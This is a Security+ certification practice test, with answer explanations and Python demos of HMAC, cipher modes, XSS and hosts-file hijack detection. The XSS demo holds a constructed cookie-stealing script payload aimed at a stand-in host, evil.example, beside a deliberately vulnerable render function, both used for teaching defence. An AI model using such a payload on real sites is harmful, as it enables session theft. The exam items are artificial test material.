CompTIA Security+ Cert. (SY0-501): Practice Tests #3
All of the following are considered secure password creation practices EXCEPT: A.Passwords must include the userid. B.Passwords must not use common dictionary-based words. C.Passwords must use a mixture of uppercase, lowercase, numbers, and special characters. D.Passwords must be of sufficient length.
A.Passwords must include the userid Correct Answer: Passwords should not be created that include the user's userid, since the userid is public and gives an attacker a known substring to start from. Incorrect Answers: B, C & D are all practices that contribute to a secure password. (Current guidance such as NIST SP 800-63B weights length and screening against breached-password lists more heavily than forced character mixing, but the exam still treats all three as good practice.)
Which of the following is typically conducted as a first step in the overall business continuity/disaster recovery strategy? A.Disaster recovery plan B.System backup plan C.Business continuity plan D.Business impact analysis
D.Business impact analysis The business impact analysis (BIA) is the critical first step in developing the business continuity plan (BCP): it is essentially the risk assessment for the BCP, determining which risks are present and what effect they would have on the business and its assets. Incorrect Answers: C.The BCP is the overall and final product that the BIA contributes to. A.The disaster recovery plan (DRP) concerns itself with recovering the assets and operations of the business immediately following a disaster. B.A system backup plan is only one element of the DRP and may or may not be one of the first things accomplished for that plan.
A user complains that he or she cannot access sites that use the HTTPS protocol. Which port should be opened on the firewall to allow this traffic? A.80 B.8080 C.443 D.22
C.443 TCP port 443 is used by HTTPS, which is HTTP carried over SSL/TLS as its secure session protocol. In practice that means TLS today, since every version of SSL is deprecated. Incorrect Answers: A.Port 80 is used by plain HTTP. B.Port 8080 is used by some proxy server implementations and alternate HTTP listeners. D.Port 22 is used by SSH.
You are the security administrator for a small company and would like to limit clients that can connect to the wireless network by hardware address. What would you do? A.Implement MAC filtering B.Implement WEP C.Implement NAC D.Enable SSID cloaking
A. Implement MAC filtering MAC address filtering can be used to limit which clients, by hardware address, can connect to the wireless network. It is not an effective security measure by itself: MAC addresses are transmitted in the clear in every frame, so an attacker can sniff an allowed address and spoof it. Incorrect Answers: B.WEP is a (long-broken) wireless encryption protocol; it does not restrict clients by hardware address. C.NAC prevents clients from connecting that do not meet specified security requirements, such as patch level or antivirus signature. D.SSID cloaking merely prevents potential wireless clients from seeing the wireless network name by stopping it from being broadcast.
Which of the following terms is most accurately defined by the amount of time a business can survive without a particular function? A.Maximum tolerable downtime (MTD) B.Mean time between failures (MTBF) C.Recovery time objective (RTO) D.Recovery point objective (RPO)
A. Maximum tolerable downtime (MTD) The maximum tolerable downtime (MTD) indicates how long an asset may be down or offline without seriously impacting the organization. Incorrect Answers: B.The mean time between failures is an estimate of how long a piece of equipment will perform before failure. C&D.The recovery point objective and recovery time objective refer to how much data may be lost during a failure or disaster and the maximum amount of time it must take to recover the system or data, respectively, before the organization is seriously impacted.
Which of the following is used to verify the integrity of the message? A.Message digest B.Digital signature C.Digital certificate D.Symmetric key
A. Message digest A message digest, or hash, can be used to verify the integrity of a message by comparing the original hash to one generated after receipt of the message. If the two match, then integrity is assured; if they do not match, then the message was altered between transmission and receipt. Note the caveat a practitioner relies on: a bare digest only detects accidental corruption. An attacker who can modify the message in transit can just as easily recompute and replace the digest, so a keyed MAC (such as HMAC) or a digital signature is needed to detect deliberate tampering. Incorrect Answers: C.Digital certificates contain public keys that are distributed to users. B.Digital signatures (a hash signed with a private key) provide authentication and nonrepudiation on top of integrity; the exam treats the plain digest as the pure integrity mechanism. D.Symmetric keys are used to provide confidentiality, not integrity.
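The distinction above, as an added example that is not part of the practice test: a plain SHA-256 digest is recomputed by the attacker along with the altered message and the check still passes, while an HMAC over the same message fails because the attacker lacks the shared key. The message, the substitution, and the shared key are constructed for the demo.

```python
# Added example (not from the practice test): plain digest vs keyed HMAC.
import hashlib
import hmac
import secrets

# Constructed sample: a message and a secret shared by sender and receiver.
MESSAGE = b"transfer 100 to account 1234"
SHARED_KEY = secrets.token_bytes(32)  # would be provisioned out of band in practice


def digest(message: bytes) -> str:
    """Plain SHA-256 message digest: integrity against accidental corruption only."""
    return hashlib.sha256(message).hexdigest()


def verify_digest(message: bytes, expected: str) -> bool:
    """Recompute the digest and compare in constant time."""
    return hmac.compare_digest(digest(message), expected)


def tag(message: bytes, key: bytes) -> str:
    """HMAC-SHA256 over the message: integrity plus origin authentication
    for any party holding the key (both parties hold it, so no nonrepudiation)."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_tag(message: bytes, key: bytes, expected: str) -> bool:
    # compare_digest avoids leaking how many leading bytes matched
    return hmac.compare_digest(tag(message, key), expected)


def attacker_tampers(message: bytes):
    """An attacker who can rewrite the message can also recompute a plain hash."""
    tampered = message.replace(b"1234", b"6666")
    return tampered, digest(tampered)


def demo() -> dict:
    """Run both checks against the original and the tampered message."""
    h = digest(MESSAGE)
    t = tag(MESSAGE, SHARED_KEY)
    tampered, forged_digest = attacker_tampers(MESSAGE)
    return {
        "digest_ok_original": verify_digest(MESSAGE, h),
        "digest_ok_after_forge": verify_digest(tampered, forged_digest),  # True: undetected
        "hmac_ok_original": verify_tag(MESSAGE, SHARED_KEY, t),
        "hmac_ok_tampered": verify_tag(tampered, SHARED_KEY, t),  # False: detected
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The HMAC detects the substitution because the attacker cannot produce a valid tag without the key; it still does not give nonrepudiation, since the receiver holds the same key and could have produced the tag too. That is the gap a digital signature closes.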
Which of the following protocols is considered a secure replacement for Telnet? A.SSH B.SSL C.TLS D.RLOGIN
A. SSH Secure Shell (SSH) is considered a secure replacement for Telnet: it encrypts the session and authenticates the server, where Telnet sends everything, including passwords, in cleartext. Incorrect Answers: B&C.SSL and TLS are secure session protocols used for HTTPS traffic, not terminal access. D.RLOGIN is an older, nonsecure remote login protocol that SSH also replaces.
Which of the following statements are correct with regard to the concepts of fail-secure and fail-safe? (Choose two.) A.A fail-safe device responds by not doing anything to cause harm when the failure occurs. B.A fail-safe device responds by making sure the device is using a secure state when a failure occurs. C.A fail-secure device responds by not doing anything to cause harm when the failure occurs. D.A fail-secure device responds by making sure the device is using a secure state when a failure occurs.
A.A fail-safe device responds by not doing anything to cause harm when the failure occurs. D.A fail-secure device responds by making sure the device is using a secure state when a failure occurs. Fail-safe prioritizes people and property (a door lock that releases on power loss so nobody is trapped); fail-secure prioritizes protection of the asset (a lock that stays engaged on power loss). Incorrect Answers: B and C swap the two definitions: B attributes the fail-secure behavior to fail-safe, and C attributes the fail-safe behavior to fail-secure.
What is the second step in the incident response life cycle? A.Detection and analysis B.Preparation C.Containment, eradication, and recovery D.Post-incident activity
A.Detection and analysis Correct Answer: Detection and analysis is the second step of the incident response life cycle. Incorrect Answers: In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.
During which type of assessment would penetration testers not have any knowledge about the network and network defenders have no knowledge of the test itself? A.Double-blind test B.Blind test C.Gray box test D.Black box test
A.Double-blind test In a double-blind test, testers have no prior knowledge of the network they are testing, and network defenders have no prior knowledge of the test and aren't aware of any attacks unless they can detect and defend against them. This test is designed to test the defenders' abilities to detect and respond to attacks and to test and exploit vulnerabilities on the network. Incorrect Answers: B&D.In a black box test, only the testers have no knowledge of details about this network configuration. This type of test is also referred to as a blind test. C.In a gray box test, the penetration tester may have some limited knowledge of the network or systems, gained from the organization that wants the test.
Which of the following describes an alternate processing site that is instantly available in the event of a disaster? A.Hot site B.Cold site C.Reciprocal site D.Warm site
A.Hot site A hot site is an alternate processing site that can function almost immediately after a disaster and has equipment and data prepositioned, as well as full utilities. Incorrect Answers: B.Cold sites have only space and utilities available and take longer to activate. D.Warm sites have space, utilities, and possibly some equipment and furniture, but still need equipment, personnel, and data transferred, so they cannot be activated instantly. C.Reciprocal sites are alternate locations provided by and in agreement with another organization and are typically co-located with that organization.
An example of the risk mitigation strategy that involves transferring risk to another entity would be: A.Insurance B.Separation of duties C.Alternate site D.Service-level agreement
A.Insurance Insurance is a method of risk transference where the organization pays a premium for the insurance company to assume the risk. If a disaster or event occurs, the organization is paid for its losses. Incorrect Answers: B.Separation of duties transfers key duties to another individual but does not transfer the risk away from the organization. D.A service-level agreement between two parties specifies levels of service and support, but the organization still maintains risk. C.An alternate site is used to transfer operations from a primary site in the event of a disaster, but the risk is still borne by the organization.
Which of the following is a form of intentional interference with a wireless network? A.Jamming B.Evil twin C.MAC spoofing D.SSID cloaking
A.Jamming Jamming is an intentional interference with the signal of a wireless network. It is often part of a DoS attack. Incorrect Answers: B.An evil twin attack is a rogue wireless access point set up to be nearly identical to a legitimate access point. D.SSID cloaking is a weak security measure designed to hide the broadcasting of a wireless network's service set identifier. C.MAC spoofing is an attempt to impersonate another host by using its MAC address.
Which of the following disaster recovery technologies is used to help protect you from failures related to a hard disk? A.RAID B.Network load balancing C.Striping without parity D.Clustering
A.RAID Redundant Array of Independent Disks (RAID) is used to provide for fault tolerance and recovery against disk failures. Incorrect Answers: C.Striping is used to improve performance but offers no fault tolerance unless used with parity bits. D.Clustering is used to provide server fault tolerance. B.Network load balancing is used to enhance network performance through balancing network traffic among servers.
Which of the following is an example of a trusted OS? A.SELinux B.Windows Server C.Windows 10 D.Ubuntu Linux
A.SELinux SELinux is the only example, from the answers given, of a trusted operating system: it adds mandatory access control (security labels enforced by the kernel) to Linux, which is what the "trusted" designation refers to. Incorrect Answers: B, C & D.These operating systems are not considered trusted operating systems, although they can be hardened to varying degrees.
Which of the following algorithms is the stronger hashing algorithm? A.SHA-1 B.3DES C.MD5 D.AES-256
A.SHA-1 SHA-1 (Secure Hash Algorithm 1) generates a 160-bit hash, which is stronger than MD5's 128-bit output. Note that SHA-1 is only the stronger choice among the options listed: practical collision attacks against it have been published, and new designs should use SHA-2 (SHA-256 or stronger) or SHA-3. Incorrect Answers: C.MD5 is a hashing algorithm that generates a 128-bit hash and is weaker than SHA-1. B&D.3DES and AES-256 are symmetric encryption algorithms, not hashing algorithms.
When working with asymmetric encryption, which of the following is used to encrypt a message sent from Bob to Sue? A.Sue's public key B.Sue's private key C.Bob's private key D.Bob's public key
A.Sue's public key Sue's public key is used to encrypt a message from Bob to Sue, as only Sue's private key can decrypt it. Incorrect Answers: B.Sue's private key can only decrypt the message, and Bob does not possess it. C&D.Neither of Bob's keys can be used to encrypt a confidential message to Sue; Bob's private key is used for signing, and anything encrypted with Bob's public key could only be read by Bob.
Which of the following protocols is a more secure version of the SSL protocol? A.TLS B.RSA C.AES D.SSH
A.TLS Transport Layer Security (TLS) is the successor to SSL and is considered its stronger replacement; SSL 2.0 and 3.0 are deprecated and should be disabled. Incorrect Answers: D.SSH is a secure replacement for Telnet and other nonsecure protocols. C.AES is a symmetric algorithm that replaces DES. B.RSA is an asymmetric algorithm used in public key cryptography.
In a PKI infrastructure, what is the name of the list that contains all the certificates that have been deemed invalid? A.Certificate invalidation list B.Certificate revocation list C.Certificate authority D.Certificate denial list
B. Certificate revocation list A certificate revocation list (CRL) contains a list of all invalid or revoked certificates. Incorrect Answers: A&D.A certificate denial list and certificate invalidation list are false choices and do not exist. C.A certificate authority is responsible for issuing certificates.
Which of the following steps is the first to be accomplished during a penetration test? A.Password cracking B.Obtain permission for the test C.Port scanning D.Privilege escalation
B. Obtain permission for the test Before beginning any type of penetration test or vulnerability assessment, you must first obtain permission from the responsible system owner to avoid legal or liability issues. Incorrect Answers: Although these are all valid steps to take during a penetration test or vulnerability assessment, none of these should be started without obtaining permission from the responsible system owner.
Which of the following network devices provides centralized authentication services for secure remote access connections? A.Firewall B.VPN concentrator C.Router D.Proxy server
B. VPN Concentrator A VPN concentrator serves as a centralized authentication point for virtual private network connections. Incorrect Answers: None of these devices are used to provide centralized authentication services for secure remote access connections.
Which of the following attacks is NOT typically attempted by a rogue access point on a wireless network? A.Interference B.Brute force C.Spoofing D.Evil twin
B.Brute force A brute-force attack is typically a password attack. It may be used separately to break wireless passwords but is not unique to wireless attacks. Incorrect Answers: All of these are attack methods that a rogue access point could attempt to engage in, resulting in a denial-of-service condition on the wireless network (as in the case of intentional interference), or by spoofing valid access points to entice an unsuspecting client to connect to it.
Which of the following technologies is NOT typically used to design secure network architectures? A.VLAN B.Clustering C.VPN D.DMZ
B.Clustering Although it is part of high availability design, clustering is not typically used in the design and implementation of a secure network architecture. Incorrect Answers: D.DMZs are used as a security buffer zone to separate internal networks and resources from externally accessible ones. A.VLANs are used to segregate local networks, providing a secure internal infrastructure. C.VPNs provide for secure remote access solutions.
Which of the following attacks seeks to introduce erroneous or malicious entries into a server's hostname-to-IP address cache or zone file? A.Session hijacking B.DNS poisoning C.ARP poisoning D.DHCP poisoning
B.DNS poisoning DNS poisoning involves introducing false entries into a DNS server's zone file, or a server's hostname-to-IP address cache, both with the intent of misdirecting a DNS resolution request to a different server or site. Incorrect Answer: C.ARP poisoning involves introducing false entries into a host's ARP cache, which maps MAC addresses to IP addresses. D.DHCP poisoning is a false term, although there are several known DHCP network attacks. A.Session hijacking involves intercepting and taking over an in-progress communications session between two hosts.
Which of the following DES/AES encryption modes is considered the weakest? A.CTR B.ECB C.OFB D.CBC
B.ECB With ECB (Electronic Codebook) mode, each block is encrypted independently, so a given block of plaintext always produces the same block of ciphertext under the same key. This predictability leaks patterns in the plaintext (identical records, repeated headers) and makes ECB weak. Incorrect Answers: A, C & D.While CBC, OFB, and CTR mode go about the process in different ways, each chains or feeds in an IV or counter so that repeated plaintext blocks do not produce repeated ciphertext blocks, adding strength to the underlying cryptosystem. Each has its own requirement, however: CBC needs an unpredictable IV, and CTR and OFB must never reuse a nonce under the same key.
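The ECB weakness described above, as an added example that is not part of the practice test. Because the Python standard library has no AES, the block cipher here is a small keyed Feistel network built on SHA-256; it is a constructed stand-in that behaves like any 128-bit block cipher for the purpose of the demonstration (ECB and CBC are mode-level properties, independent of the cipher). The key, IV, and plaintext are constructed for the demo.

```python
# Added example (not from the practice test): ECB leaks repeated blocks, CBC hides them.
import hashlib

BLOCK = 16  # 128-bit block size, like AES


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(half: bytes, key: bytes, i: int) -> bytes:
    # Keyed round function for the toy Feistel cipher (stand-in for AES, not for real use).
    return hashlib.sha256(key + bytes([i]) + half).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes, rounds: int = 8) -> bytes:
    """Encrypt one 16-byte block with an 8-round Feistel network."""
    left, right = block[: BLOCK // 2], block[BLOCK // 2:]
    for i in range(rounds):
        left, right = right, _xor(left, _round(right, key, i))
    return left + right


def block_decrypt(key: bytes, block: bytes, rounds: int = 8) -> bytes:
    """Invert block_encrypt by running the rounds backwards."""
    left, right = block[: BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(rounds)):
        left, right = _xor(right, _round(left, key, i)), left
    return left + right


def _blocks(data: bytes):
    assert len(data) % BLOCK == 0, "demo assumes block-aligned input (no padding)"
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """ECB: every block encrypted independently, so equal blocks stay equal."""
    return b"".join(block_encrypt(key, b) for b in _blocks(plaintext))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC: each block is XORed with the previous ciphertext block before encryption."""
    prev, out = iv, []
    for b in _blocks(plaintext):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, []
    for c in _blocks(ciphertext):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def repeated_blocks(data: bytes) -> int:
    """Number of blocks that duplicate an earlier block (the pattern an eavesdropper sees)."""
    blocks = _blocks(data)
    return len(blocks) - len(set(blocks))


def demo() -> dict:
    key = b"k" * 16            # constructed fixed key for a reproducible run
    iv = bytes(range(16))      # constructed IV; in real CBC this must be unpredictable
    # Five 16-byte records, four of them identical.
    plaintext = b"ATTACK AT DAWN!!" * 4 + b"RETREAT AT NOON!"
    ecb = ecb_encrypt(key, plaintext)
    cbc = cbc_encrypt(key, iv, plaintext)
    return {
        "plaintext_repeats": repeated_blocks(plaintext),
        "ecb_repeats": repeated_blocks(ecb),   # same as plaintext: structure leaks
        "cbc_repeats": repeated_blocks(cbc),   # 0: chaining removes the pattern
        "cbc_roundtrip": cbc_decrypt(key, iv, cbc) == plaintext,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The ECB ciphertext has exactly as many duplicate blocks as the plaintext, so an eavesdropper can tell that four records are identical without decrypting anything; the CBC ciphertext has none. Replace the Feistel stand-in with a real cipher (for example AES via the `cryptography` package) and the result is the same.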
All of the following are advantages to using NAT, EXCEPT: A.Internal network addresses are hidden from the public. B.Firewalls and other security devices are not required. C.Specific network traffic can be sent to a particular internal address and port. D.Public IP addresses can be more effectively used by the organization.
B.Firewalls and other security devices are not required. Even when using NAT, firewalls and security devices are required on a network boundary. Incorrect Answers: All of these are advantages to using NAT.
Which type of intrusion detection system identifies suspicious activity by monitoring log files on the system? A.NIPS B.HIDS C.ACL D.NIDS
B.HIDS A host-based intrusion detection system (HIDS) monitors local system activity and log files for indications of an attack. Incorrect Answers: D.A NIDS is a network-based intrusion detection system that inspects traffic and does not monitor host log files. A.A NIPS is a network-based intrusion prevention system and works on the network instead of the host. C.An ACL is an access control list and is used to allow or deny traffic through a router or to grant/deny permissions to resources.
Your company has a salesperson who travels a lot and will be connecting to hotel networks. What security recommendation would you make for her laptop? A. Unencrypted drive B.Host-based firewall C.Null password D.FDE
B.Host-based firewall A host-based firewall should be enabled when connecting to untrusted networks, such as one in a hotel; without one, the laptop's listening services are exposed to every other guest on the network and could be attacked or infected. Incorrect Answers: A&C.An unencrypted drive and a null password are not security recommendations. D.Although full disk encryption (FDE) protects the data if the laptop is lost or stolen, it does nothing to protect the running system from hosts on an unknown and potentially hostile network.
Which of the following security measures helps ensure data protection in the event a mobile device is lost or stolen? A.Remote destruction B.Remote wiping C.Remote encryption D.Remote access
B.Remote wiping Remote wiping is used to ensure data protection and confidentiality on a mobile device in the event it is lost or stolen, by erasing the device's storage on command from the management server. Incorrect Answers: A&C.Remote destruction and remote encryption are invalid terms in this context. D.Remote access enables a remote user to authenticate to and access an organization's private network.
Which of the following identifies an example of two-factor authentication? A.Password and PIN B.Smartcard and PIN C.Username and password D.Fingerprint and retina
B.Smartcard and PIN The use of a smartcard and PIN involves the use of two factors: something you have and something you know. Incorrect Answers: All of the other answers involve the use of only one factor: something you are or something you know, but not used together.
Which of the following attacks might involve an attacker attempting to enter a facility with arms full of boxes, in an attempt to gain sympathy and have someone open the door for him or her? A.Impersonation B.Tailgating C.Dumpster diving D.Shoulder surfing
B.Tailgating A tailgating person might use some sort of creative pretext to convince someone to open the door and allow him or her to enter without proper identification. Incorrect Answers: C&D.Neither shoulder surfing nor dumpster diving are attempts to enter a facility. A.Impersonation could be used to enter a facility, but it is not being used to do so in this case.
Which of the following statements best defines the recovery point objective (RPO)? A.The RPO is the maximum amount of time the organization can afford to be down from normal processing. B.The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident. C.The RPO is the maximum allowable amount of data (measured in gigabytes) that the organization can afford to lose during a disaster or an incident. D.The RPO is the minimum amount of data the organization is expected to lose during a disaster or an incident.
B.The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident. In practice the RPO sets the maximum interval between backups or replication points: an RPO of four hours means at most four hours of work may be lost. Incorrect Answers: A.This describes downtime (the RTO/MTD), not data loss. C.RPO is measured in time, not gigabytes. D.The RPO is the maximum amount of data, not the minimum, that can be lost.
Which of the following describes the best security practice to use when granting users elevated or administrative privileges? A.Administrative privileges should be granted directly to those user accounts that perform administrative-level tasks. B.Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges. C.Users who perform administrative-level tasks should be given the Domain Administrator user account name and password. D.Users who require higher privileges should be placed in the Administrators group.
B.Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges. Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges. Incorrect Answers: None of these choices are considered to be good security practices. User accounts should not be directly granted administrative privileges, and ordinary user-level accounts should not be placed in the Administrators group. Additionally, no one should be given the Domain Administrator's username and password to use on a routine basis.
Which of the following is the best way to prevent cross-site scripting attacks? A.Block ports 443 and 80 on the firewall B.Validate the input into a web site for illegal characters in a particular field C.Restrict CGI script execution D.Require certificate-based authentication for web site access
B.Validate the input into a web site for illegal characters in a particular field Validating the input into a web site form for illegal characters in a field is the best choice offered for preventing cross-site scripting (XSS) attacks. In practice input validation is one layer: the primary defense is output encoding, escaping user-supplied data for the context (HTML body, attribute, JavaScript, URL) in which it is rendered, because free-text fields cannot be restricted to a safe character set. Incorrect Answers: A.Blocking ports 443 and 80 will make the site unusable, as these are the typical ports used to access web sites. D.Requiring certificate-based authentication will not prevent cross-site scripting attacks and is an unnecessary measure. C.Restricting CGI script execution addresses server-side script execution, not the injection of script into pages served to other users.
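The vulnerable and hardened forms side by side, as an added example that is not part of the practice test. The page fragment is a hypothetical welcome banner; the attacker payload, the allow-list pattern for a username field, and the rendering functions are all constructed for the demo.

```python
# Added example (not from the practice test): reflected XSS, then encoding plus validation.
import html
import re

# Constructed attacker input: a script that exfiltrates the session cookie.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(username: str) -> str:
    """Reflects the parameter into HTML untouched: a classic reflected XSS."""
    return "<p>Welcome, " + username + "</p>"


def render_hardened(username: str) -> str:
    """Output-encode for the HTML text context, so markup in the input is inert."""
    return "<p>Welcome, " + html.escape(username, quote=True) + "</p>"


# Allow-list for a field with a known format (the exam's answer). This is a second
# layer; encoding must still happen for any field that accepts free text.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def validate_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


def raw_payload_survives(rendered: str, payload: str = PAYLOAD) -> bool:
    """True if the page would hand the browser the payload's tags verbatim."""
    return payload in rendered


def demo() -> dict:
    return {
        "vulnerable_executes": raw_payload_survives(render_vulnerable(PAYLOAD)),
        "hardened_executes": raw_payload_survives(render_hardened(PAYLOAD)),
        "payload_passes_validation": validate_username(PAYLOAD),
        "normal_name_passes_validation": validate_username("alice_01"),
    }


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
    for name, value in demo().items():
        print(f"{name}: {value}")
```

`html.escape` is correct only for the HTML text and quoted-attribute contexts; data placed inside a `<script>` block, an event handler, or a URL needs the encoder for that context, which is why templating engines with context-aware auto-escaping are preferred over hand-built string concatenation.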
You are performing a site survey of a company location and notice that one of the wireless access points is on top of a bookshelf that is located by the outer wall of the building. What is the security concern? A.Signal degradation B.Wireless network access by persons outside the building C.Interference D.Damage due to falling
B.Wireless network access by persons outside the building Because of the placement near the outer wall, the wireless access point's signal could be detected outside the building and could allow an unauthorized user to eavesdrop on or use the connection. Incorrect Answers: D.Damage due to falling is a concern, but not the most immediate security concern. C.Interference could happen only if other wireless devices are nearby that transmit on frequencies close to the one that the access point uses. A.Signal degradation is a performance concern, not typically a security concern unless it is malicious in nature and seeks to cause a denial-of-service condition; degradation for the rest of the facility would not be caused by placing the access point next to the outer wall.
Which of the following are considered symmetric encryption algorithms? (Choose two.) A.SHA B.RSA C.3DES D.MD5 E.AES
C.3DES E.AES AES and 3DES are considered encryption standards and use symmetric algorithms (the same key encrypts and decrypts). Incorrect Answers: A&D.SHA and MD5 are hashing algorithms. B.RSA is an asymmetric algorithm.
Which of the following statements bests describes a Trusted Platform Module? A.A code module that performs authentication B.A hardware module that performs cryptographic functions C.A secure logon module D.A software module that prevents application attacks
B.A hardware module that performs cryptographic functions A Trusted Platform Module (TPM) is a hardware device, usually in the form of an embedded chip, that performs cryptographic functions such as generating and protecting keys, including the key used to encrypt an entire hard drive. Incorrect Answers: A, C & D.None of these are valid descriptions of a Trusted Platform Module; a TPM is hardware, not a code or software module.
All of the following are types of penetration testing EXCEPT: A.Gray box B.Black box C.Blue box D.White box
C.Blue box Blue box testing is not a type of penetration testing. Incorrect Answers: A.In gray box testing, the tester may have some knowledge given to them, such as an infrastructure diagram or IP address list. B.Black box testing involves a penetration test where the test team has no knowledge of the network. D.In a white box test, the test team has full and detailed knowledge of the network, its design, functions, and applications.
A printed e-mail would be considered which kind of evidence? A.Demonstrative evidence B.Direct evidence C.Documentary evidence D.Real evidence
C.Documentary evidence Documentary evidence is usually a printed form of evidence, a recording, or a photograph. Incorrect Answers: D.Real (or physical) evidence is a tangible object presented in court (such as a weapon). B.Direct evidence is testimony from someone who actually witnessed the event. A.Demonstrative evidence is a physical object presented to display the results of an event that occurred.
When performing an investigation on a mobile device, you would like to ensure that you shield the device from sending or receiving signals. What would you use? A.Spectrum analyzer B.Protocol analyzer C.Faraday cage D.Signal reducer
C.Faraday cage A Faraday cage can be used to shield devices from sending or receiving electronic signals. Incorrect Answers: B.A protocol analyzer is used to capture and view network traffic. A.A spectrum analyzer is used for site surveys when designing wireless networks. D.A signal reducer is not a device used in this context.
Which of the following choices concerns itself with ensuring that data is not modified or destroyed while in storage or transit? A.Confidentiality B.Availability C.Integrity D.Nonrepudiation
C.Integrity Integrity is concerned with ensuring that data is not modified. Incorrect Answers: A.Confidentiality protects information from unauthorized access. B.Availability provides for information and systems to be online and ready for users at any time. D.Nonrepudiation means that a user cannot deny that he or she took an action.
Which of the following keys is used for nonrepudiation? A.Public key B.Symmetric key C.Private key D.Hash
C.Private key The private key, when used for nonrepudiation, is used to sign text (in practice, to encrypt a hash of it) in a way that anyone who possesses the matching public key can verify. Since only the owner holds the private key, this assures that he or she is the one who performed the action. Used in this way the private key does not provide confidentiality, but it does provide nonrepudiation. Incorrect Answers: B&D.Symmetric keys and hashes do not provide for nonrepudiation, because a symmetric key is shared by both parties and a hash requires no key at all, so neither can prove who sent a message or performed an action. A.Public keys can be in the possession of anyone and are used in this case only to verify that the private key produced the signature.
The risk that remains after all reducing and mitigation actions have been taken is called: A.Mitigated risk B.Accepted risk C.Residual risk D.Low risk
C.Residual risk Residual risk is what risk remains after all mitigation and reduction strategies have been implemented. Incorrect Answers: D.Low risk is a level that may be accepted without mitigation or requires little mitigation. B.Accepted risk is what risk the management authority chooses to accept with or without mitigations in place. A.Mitigated risk is that risk that has been reduced to a lower level.
Which of the following network management protocols uses agents that respond to queries to report its status to a central program manager? A.SMTP B.SSH C.SNMP D.SHTTP
C.SNMP The Simple Network Management Protocol (SNMP) uses SNMP agents that respond to queries to report their status to a central management station. Note that SNMPv1 and v2c authenticate with cleartext community strings; SNMPv3 adds authentication and encryption and should be used where available. Incorrect Answers: A, B & D.These protocols are not used to manage network devices.
Which of the following networking technologies provides for local area network segregation using switches? A.VPN B.Virtualization C.VLAN D.RADIUS
C.VLAN VLANs (virtual LANs) provide for local area network segmentation and separation and are implemented on switches. Incorrect Answers: D.RADIUS is a remote access authentication technology. B.Virtualization refers to the creation and management of virtual hosts running in a virtualized environment. A.VPN is a secure remote access technology.
Which of the following files might the hacker modify in order to redirect a user to the wrong web site? A.ARP cache B.lmhosts C.hosts D.services
C.hosts The hosts file on a local machine (/etc/hosts on Unix/Linux, %SystemRoot%\System32\drivers\etc\hosts on Windows) provides fully qualified domain name (FQDN) resolution and is consulted before DNS, so an attacker with write access can map a legitimate site name to an attacker-controlled IP address and redirect users to the wrong web site. Incorrect Answers: B.The lmhosts file is a Windows-specific file that maps NetBIOS computer names to IP addresses. D.The services file lists well-known services and their ports, such as HTTP and FTP. A.The ARP cache contains recently resolved mappings of local network IP addresses to MAC addresses.
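A check for the hijack described above, as an added example that is not part of the practice test: parse a hosts file and flag any watched name that is mapped to something other than a loopback or unspecified (sinkhole) address. The sample file contents, the watched hostnames, and the 203.0.113.45 address are constructed for the demo.

```python
# Added example (not from the practice test): detect hosts-file redirection of watched names.
import ipaddress

# Constructed sample hosts file. The first entries are normal; the last two are
# the kind of entry a hosts-file hijack leaves behind.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost ip6-localhost
0.0.0.0         ads.example.net        # ad-blocking entry, harmless
203.0.113.45    www.mybank.example     # redirects the bank's site
203.0.113.45    update.vendor.example
"""

# Constructed list of names an organization would not expect to see pinned in hosts.
WATCHED = {"www.mybank.example", "update.vendor.example", "login.corp.example"}


def parse_hosts(text: str):
    """Yield (ip, hostname) pairs, skipping comments and blank lines.
    One line may list several names for the same address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower()


def is_sinkhole(ip: str) -> bool:
    """Loopback and unspecified addresses block a name rather than redirect it."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable address: treat as suspicious, not as a sinkhole
    return addr.is_loopback or addr.is_unspecified


def find_hijacks(text: str, watched=WATCHED):
    """Return (hostname, ip) for watched names mapped to a non-sinkhole address."""
    return [
        (name, ip)
        for ip, name in parse_hosts(text)
        if name in watched and not is_sinkhole(ip)
    ]


if __name__ == "__main__":
    # To check a live system, read the real file instead of SAMPLE_HOSTS:
    #   text = open("/etc/hosts", encoding="utf-8", errors="replace").read()
    for name, ip in find_hijacks(SAMPLE_HOSTS):
        print(f"WARNING: {name} is pinned to {ip} in the hosts file")
```

A sinkhole entry (a name mapped to 127.0.0.1 or 0.0.0.0) is a common, legitimate ad-blocking or malware-blocking technique, which is why the check distinguishes it from a redirect to a routable address; for a complete check, also alert on any write to the hosts file by a process other than your configuration management tooling.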
Which of the following simple command-line tools would be used from the host to determine what open ports a host is listening on? A.ifconfig B.nbtstat C.netstat D.ping
